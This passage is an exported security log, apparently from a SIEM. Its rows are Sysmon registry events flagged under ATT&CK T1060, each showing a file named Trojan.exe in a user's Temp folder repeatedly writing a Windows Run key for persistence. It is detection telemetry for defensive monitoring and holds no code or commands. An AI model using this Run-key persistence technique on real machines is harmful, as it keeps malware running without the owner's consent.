..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:56.905917100Z"",""eventRecordID"":""2035"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:56.902\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:56.902"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:27:59.274",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:55.887 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:55.897492300Z"",""eventRecordID"":""2034"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:55.887\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:55.887"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:27:57.417",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:54.871 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:54.887455400Z"",""eventRecordID"":""2033"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:54.871\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:54.871"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:27:57.351",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:53.855 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:53.910999700Z"",""eventRecordID"":""2032"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:53.855\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:53.855"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:27:56.341",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:52.840 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:52.856114500Z"",""eventRecordID"":""2031"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:52.840\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:52.840"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:27:55.226",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:51.824 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:51.842125900Z"",""eventRecordID"":""2030"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:51.824\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:51.824"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:27:54.164",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:50.793 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:50.799672700Z"",""eventRecordID"":""2029"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:50.793\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:50.793"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:27:53.164",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:49.778 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:49.792725200Z"",""eventRecordID"":""2028"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:49.778\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:49.778"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:27:51.156",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:48.730 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:48.740056300Z"",""eventRecordID"":""2027"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:48.730\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:48.730"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:27:51.138",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:47.699 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:47.730915000Z"",""eventRecordID"":""2026"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:47.699\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:47.699"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:27:50.102",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:46.684 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:46.712507300Z"",""eventRecordID"":""2025"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:46.684\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:46.684"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:27:49.143",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:45.668 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 